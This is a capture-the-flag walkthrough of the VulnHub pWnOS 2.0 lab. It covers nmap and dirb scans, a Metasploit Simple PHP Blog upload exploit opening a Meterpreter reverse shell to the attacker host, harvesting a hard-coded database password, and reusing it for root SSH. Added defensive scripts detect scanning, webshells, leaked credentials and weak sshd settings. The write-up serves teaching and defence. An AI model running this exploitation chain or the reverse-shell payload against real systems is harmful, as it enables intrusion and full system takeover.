This article is intended solely for technical exchange, study and research. Using the techniques described here for illegal purposes or to cause damage is strictly prohibited; the author bears no responsibility for any consequences.
Target: pWnOS: 2.0 (Pre-Release)
1.1 Environment
Download: pWnOS: 2.0 (Pre-Release) ~ VulnHub
Number of flags: 1
Attacker: Kali
Attacker 1 address: 10.10.10.128
Target address: 10.10.10.100
1.2 Tools
1.2.1 nmap:
Nmap ("Network Mapper") is an open-source tool for network discovery and security auditing. It was designed to scan large networks quickly, but it works just as well against a single host. Nmap uses raw IP packets in novel ways to determine which hosts are available on the network, which services (application name and version) those hosts offer, which operating systems (and versions) they run, what kind of packet filters or firewalls are in use, and dozens of other characteristics. Although Nmap is commonly used for security audits, many system and network administrators also use it for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
Official site: https://nmap.org
1.2.2 msf:
Metasploit (MSF) is a free, downloadable framework.
It ships with hundreds of exploits for known software vulnerabilities and is a professional-grade exploitation tool.
When H.D. Moore released Metasploit in 2003, the state of computer security changed for good: almost overnight, anyone could become a hacker, because anyone who learns to use MSF can attack vulnerabilities that are unpatched or were only recently patched.
1.2.3 dirb:
dirb is a dictionary-based web directory scanner. It recurses into the directories it finds to discover more, and it supports proxies and sites protected by HTTP authentication.
Usage: dirb <url_base> [<wordlist_file(s)>] [options]
-a  set the User-Agent
-p <proxy[:port]>  use a proxy
-c  set a cookie
-z  add a delay in milliseconds, to avoid flooding the target
-o  write results to a file
-X  append an extension to every word in the wordlist
-H  add a request header
-i  case-insensitive search
1.3 Services
1.3.1 MySQL:
MySQL is the most popular relational database management system and, for web applications, one of the best RDBMS (Relational Database Management System) products available.
A database is a repository that organizes, stores and manages data according to a data structure.
Every database offers one or more APIs for creating, accessing, managing, searching and replicating the data it holds.
Data could also be stored in plain files, but reading and writing files is comparatively slow.
That is why relational database management systems (RDBMS) are used today to store and manage large volumes of data. A relational database is built on the relational model and processes its data with mathematical concepts and methods such as set algebra.
Characteristics of an RDBMS (Relational Database Management System):
- 1. Data is presented as tables
- 2. Each row is one record
- 3. Each column is one field of the record
- 4. Many rows and columns make up a table
- 5. A number of tables make up a database
1.3.2 SSH:
SSH (Secure Shell) is a network security protocol that uses encryption and authentication to provide secure remote access, file transfer and similar services. Traditional remote-login and file-transfer methods such as Telnet and FTP send data in cleartext and carry many security risks; as attention to network security has grown, they have gradually fallen out of use. SSH encrypts and authenticates network traffic, providing secure login and other secure network services over untrusted networks. As the secure replacement for Telnet and other insecure remote-shell protocols, SSH is now used worldwide and supported by most devices.
1.4 Vulnerabilities
1.4.1 Weak SSH password:
A weak password has no strict, precise definition; it is generally any password that someone else (possibly someone who knows you well) could guess, or that a cracking tool could recover. In practice it means a password made only of simple digits and letters, such as "123" or "abc". Such passwords are easily broken and put the user's machine at risk, so they should not be used.
1.4.2 CVE-2005-2787, CVE-2005-2733, CVE-2005-2192:
Simple PHP Blog 0.4.0 - Multiple Remote s - PHP webapps Exploit (exploit-db.com)
Simple PHP Blog is a deliberately simple PHP blog engine. It needs no database, stores everything in plain text files, and looks quite good. Its main advantages are that it requires only PHP 5 and write permission; there is no setup beyond unpacking and copying the files.
1.5 Walkthrough
1.5.1 Port scan
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -T4 10.10.10.100
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-04 05:15 EST
Nmap scan report for 10.10.10.100
Host is up (0.000092s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:2A:E1:E6 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.01 seconds
# Two services are exposed, http and ssh, and both are worth pursuing
1.5.2 Run dirb
┌──(root㉿kali)-[~]
└─# dirb http://10.10.10.100 /usr/share/wordlists/dirb/big.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jan 4 06:00:54 2023
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)
---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/colors (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5902)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8093)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5651)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4935)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5293)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upload_img (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Wed Jan 4 06:01:24 2023
DOWNLOADED: 40916 - FOUND: 28
# Browse to http://10.10.10.100/blog/
# The page source reveals the blog software's version number
1.5.3 Search for Simple PHP Blog 0.4.0 vulnerabilities and exploit them with msf
┌──(root㉿kali)-[/home/git_conf]
└─# msfconsole
=[ metasploit v6.2.26-dev ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Search can apply complex filters such as
search cve:2009 type:exploit, see all the filters
with help search
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search Simple PHP Blog 0.4.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/sphpblog_file_upload
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/sphpblog_file_upload) > show options
Module options (exploit/unix/webapp/sphpblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /sphpblog yes Sphpblog directory path
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.10.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/sphpblog_file_upload) > set rhosts 10.10.10.100
rhosts => 10.10.10.100
msf6 exploit(unix/webapp/sphpblog_file_upload) > set uri /blog
uri => /blog
msf6 exploit(unix/webapp/sphpblog_file_upload) > run
[*] Started reverse TCP handler on 10.10.10.128:4444
[+] Successfully retrieved hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as oo4HMo:BgcDWb
[+] Successfully retrieved cookie: jvt27g980ck0du05h20bi91nl2
[+] Successfully uploaded 1jqiyq9jALglWoUzLJlG.php
[+] Successfully uploaded zEmTR5v16rhMNSjrTERf.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/1jqiyq9jALglWoUzLJlG.php
[*] Calling payload: /images/zEmTR5v16rhMNSjrTERf.php
[*] Sending stage (39927 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.100:41464) at 2023-01-04 06:19:58 -0500
[+] Successfully removed /images/zEmTR5v16rhMNSjrTERf.php
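Both the dirb run (about forty thousand requests in thirty seconds, all but 28 of them misses) and the module output above (reading /config/password.txt, uploading a .php into /images/ and then requesting it) leave a distinctive trace in the Apache access log. The script below is an added example written for this write-up; it is not part of the original and not code from dirb, Metasploit or Simple PHP Blog. It parses combined-format log lines and flags (1) an address whose requests within a one-minute window are almost all 4xx, and (2) any request for a script under a directory that should only hold static files, or any request into /blog/config/. The log lines, IP addresses, file names and thresholds are constructed assumptions.

```python
"""Triage Apache access logs for a dictionary scan and for a script being
fetched from an upload/static directory.  Constructed example for this
write-up; log lines and thresholds are made up."""
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format; the timestamp is parsed so requests can be windowed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumptions for this host, taken from the dirb listing: directories that should
# never serve scripts, and the directory whose contents are credentials, not pages.
STATIC_DIRS = ("/blog/images/", "/blog/content/", "/blog/flash/", "/blog/themes/")
SECRET_DIRS = ("/blog/config/",)
SCRIPT_EXT = (".php", ".phtml", ".php5")

def parse(lines):
    """Parse combined-format lines into dicts; silently skips malformed lines."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
        out.append(rec)
    return out

def detect_scanners(records, min_requests=20, miss_ratio=0.8, window_s=60):
    """IPs with >= min_requests inside some window_s-second window, mostly 4xx.
    Sliding window over each IP's requests sorted by time."""
    by_ip = defaultdict(list)
    for r in records:
        by_ip[r["ip"]].append(r)
    flagged = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        lo = 0
        for hi in range(len(recs)):
            while (recs[hi]["ts"] - recs[lo]["ts"]).total_seconds() > window_s:
                lo += 1
            win = recs[lo:hi + 1]
            misses = sum(1 for r in win if 400 <= r["status"] < 500)
            if len(win) >= min_requests and misses / len(win) >= miss_ratio:
                flagged[ip] = {"requests": len(win), "misses": misses}
                break
    return flagged

def detect_webshell_activity(records):
    """Requests that fetch a script from a static-only directory, or that touch
    the credential directory. Returns (ip, path, status, reason) tuples."""
    hits = []
    for r in records:
        path = r["path"].split("?", 1)[0]
        if path.startswith(STATIC_DIRS) and path.lower().endswith(SCRIPT_EXT):
            hits.append((r["ip"], path, r["status"], "script under static dir"))
        elif path.startswith(SECRET_DIRS):
            hits.append((r["ip"], path, r["status"], "access to config dir"))
    return hits

def sample_log():
    """Constructed log: 25 rapid misses from one address, then a read of the
    config dir, an upload, and a call to the uploaded file from another.
    No IP or file name here is real."""
    base = ('10.0.0.{} - - [04/Jan/2023:06:00:{:02d} -0500] "GET {} HTTP/1.1" '
            '{} 288 "-" "Mozilla/5.0"')
    lines = [base.format(50, i, f"/word{i}", 404) for i in range(25)]
    lines.append(base.format(50, 30, "/blog/index.php", 200))
    lines += [
        base.format(51, 40, "/blog/config/password.txt", 200),
        base.format(51, 41, "/blog/upload_img.php", 200),
        base.format(51, 42, "/blog/images/EXAMPLE.php", 200),
        base.format(52, 43, "/blog/images/logo.png", 200),
    ]
    return lines

def triage(lines):
    """Run both detectors over raw log lines."""
    records = parse(lines)
    return detect_scanners(records), detect_webshell_activity(records)

if __name__ == "__main__":
    scanners, shells = triage(sample_log())
    print("scanner IPs:", scanners)
    for hit in shells:
        print("ALERT:", hit)
```

On the target, two server-side changes would have removed the second class of finding outright: `Options -Indexes` for the directories dirb reported as listable, and disabling PHP execution in the image upload directory (with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for /blog/images/).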
meterpreter > shell
Process 1091 created.
Channel 0 created.
sh: getcwd() failed: No such file or directory
sh: getcwd() failed: No such file or directory
whoami
#www-data
sudo -l
sudo: no tty present and no askpass program specified
cd /var/www
ls
activate.php
blog
includes
index.php
info.php
login.php
mysqli_connect.php
register.php
# Found the database connection file
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Cou
?>
# But these credentials do not connect
mysql -uroot -p'goodday'
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using passwor
mysql -uroot -pgoodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
# The file shows MySQL is present; use find to look for other copies
find / -name mysqli_connect.php 2>/dev/null
/var/mysqli_connect.php
/var/www/mysqli_connect.php
pwd
/var
ls
backups
cache
crash
index.html
lib
local
lock
log
mail
mysqli_connect.php
opt
run
spool
tmp
uploads
www
cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
// Make the connection:
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );
?>
# Try these credentials over SSH as well: for the sake of memory, some administrators reuse the same password and never change it
1.5.4 SSH login
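The two copies of mysqli_connect.php (one in /var/www, one in /var) and the remark about administrators reusing passwords point to a check a defender can run: find database passwords hard-coded in PHP under and around the web root, and flag the same secret appearing in more than one file. The script below is an added example written for this write-up; it is not code from pWnOS or Simple PHP Blog. It writes constructed sample files (with made-up passwords) into a temporary directory that mirrors the layout seen on the target, then scans them; the DEFINE/assignment patterns, the "www" web-root name and the warning texts are assumptions of the example.

```python
"""Find database credentials hard-coded in PHP files and flag a secret that is
reused across files.  Constructed example for this write-up; the sample files
are written to a temporary directory so it runs offline."""
import os
import re
import tempfile
from collections import defaultdict

# DEFINE ('DB_PASSWORD', '...') / define("DB_PASS", "...") with arbitrary spacing,
# as in the target's mysqli_connect.php.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](?P<name>[A-Z_]*PASS(?:WORD)?[A-Z_]*)['"]\s*,\s*['"](?P<value>[^'"]*)['"]\s*\)""",
    re.IGNORECASE,
)
# $password = '...'; / $db_pass = "..."; style assignments.
ASSIGN_RE = re.compile(
    r"""\$(?P<name>\w*pass\w*)\s*=\s*['"](?P<value>[^'"]*)['"]""",
    re.IGNORECASE,
)

def scan_file(path):
    """Return [(name, value)] for every literal password found in one PHP file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    found = [(m.group("name"), m.group("value")) for m in DEFINE_RE.finditer(text)]
    found += [(m.group("name"), m.group("value")) for m in ASSIGN_RE.finditer(text)]
    return found

def scan_tree(root, web_root="www"):
    """Walk `root`; return ({relative_path: [(name, value)]}, warnings).
    Warnings cover a credential file inside the web root (Apache serves that
    directory) and the same secret reused across several files."""
    web_root = os.path.join(root, web_root)
    findings = {}
    by_value = defaultdict(list)
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            creds = scan_file(path)
            if not creds:
                continue
            rel = os.path.relpath(path, root)
            findings[rel] = creds
            for _, value in creds:
                by_value[value].append(rel)
    warnings = []
    for rel in sorted(findings):
        path = os.path.join(root, rel)
        if os.path.commonpath([path, web_root]) == web_root:
            warnings.append(f"credential file under web root: {rel}")
    for value, rels in sorted(by_value.items()):
        if len(rels) > 1:
            warnings.append(f"same secret in {len(rels)} files: {sorted(rels)}")
    return findings, warnings

def build_sample_tree():
    """Constructed sample mirroring the target: a stale mysqli_connect.php in the
    web root and the live copy one level up (both passwords are made up)."""
    root = tempfile.mkdtemp(prefix="credscan_")
    samples = {
        "www/mysqli_connect.php": "<?php\nDEFINE ('DB_USER', 'root');\nDEFINE ('DB_PASSWORD', 'sample-old-pw');\n?>",
        "mysqli_connect.php": "<?php\nDEFINE ('DB_USER', 'root');\nDEFINE ('DB_PASSWORD', 'sample-live-pw');\n?>",
        "www/blog/config/settings.php": "<?php\n$db_pass = 'sample-live-pw';\n",
        "www/blog/index.php": "<?php echo 'no secrets here'; ?>",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    sample_root = build_sample_tree()
    found, warns = scan_tree(sample_root)
    for rel, creds in found.items():
        print(rel, creds)
    for w in warns:
        print("WARNING:", w)
```

Run against a real host with `scan_tree("/var", web_root="www")`; a credential that also unlocks a system account cannot be detected offline, which is exactly why the reuse warning is worth acting on before someone tries it over SSH.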
┌──(root㉿kali)-[~]
└─# ssh root@10.10.10.100
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3+AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)
* Documentation: http://www.ubuntu.com/server/doc
System information as of Wed Nov 9 15:02:51 EST 2022
System load: 0.0 Processes: 83
Usage of /: 3.3% of 38.64GB Users logged in: 0
Memory usage: 24% IP address for eth0: 10.10.10.100
Swap usage: 0%
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~#
# Logged in successfully
1.5.5 Getting the flag
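The root login above succeeds because sshd on the target accepts password authentication for root, and the root password is the one sitting in a PHP file readable by the web server user. The audit below is an added example written for this write-up (not part of the original and not code from pWnOS or OpenSSH): it resolves an sshd_config the way sshd does, where the first occurrence of a keyword wins and Match blocks are conditional, and reports the settings that turn a leaked password into a root shell. The two configuration samples are constructed; the keyword names and defaults are real OpenSSH ones.

```python
"""Audit sshd_config for the settings that let a reused password log in as root.

Constructed example for this write-up.  Parsing follows sshd's own rules for
these keywords: names are case-insensitive, '#' starts a comment, keyword and
value are separated by whitespace or '=', and the FIRST occurrence of a
keyword wins, so a hardening line appended below 'PermitRootLogin yes' does
nothing.  Settings inside a Match block are conditional and are not audited.
"""
import re

# Keyword -> values acceptable for an internet-facing host.
SAFE_VALUES = {
    "permitrootlogin": {"no", "prohibit-password", "without-password"},
    "passwordauthentication": {"no"},
    "pubkeyauthentication": {"yes"},
}

# Defaults applied when the keyword is absent.  These are modern OpenSSH
# defaults (PermitRootLogin changed to prohibit-password in 7.0); the OpenSSH
# 5.8 build on the target still defaulted PermitRootLogin to yes.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
}

def effective_settings(config_text):
    """Return {keyword: value} as sshd resolves the global section."""
    settings = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        key = parts[0].lower()
        if key == "match":
            break                      # everything below is conditional
        if key in SAFE_VALUES and key not in settings and len(parts) == 2:
            settings[key] = parts[1].strip().lower()
    for key, default in DEFAULTS.items():
        settings.setdefault(key, default)
    return settings

def audit_sshd_config(config_text):
    """Return sorted (keyword, effective_value) pairs outside SAFE_VALUES."""
    eff = effective_settings(config_text)
    return sorted((k, v) for k, v in eff.items() if v not in SAFE_VALUES[k])

# Constructed: the permissive configuration that makes a reused DB password a root shell.
WEAK_CONFIG = """\
# sshd_config (constructed sample)
Port 22
PermitRootLogin yes
PasswordAuthentication yes
# Someone 'hardened' this by appending below; sshd ignores it because the
# first occurrence of each keyword wins.
PermitRootLogin no
PasswordAuthentication no
"""

# Constructed: the corrected configuration.  The Match block is allowed to
# re-enable passwords for one non-root account without affecting the audit.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
Match User deploy
    PasswordAuthentication yes
"""

if __name__ == "__main__":
    print("weak:", audit_sshd_config(WEAK_CONFIG))
    print("hardened:", audit_sshd_config(HARDENED_CONFIG))
```

Feed it the real file with `audit_sshd_config(open("/etc/ssh/sshd_config").read())`; an empty list means root cannot be reached with a password at all, regardless of how weak or widely reused that password is.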
root@web:~# cd /root
root@web:~# ls
root@web:~# cd /home/
root@web:/home# ls
dan
root@web:/home# cd dan/
root@web:/home/dan# ls
root@web:/home/dan# cd /root
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~#
# No flag after all, but we have full root privileges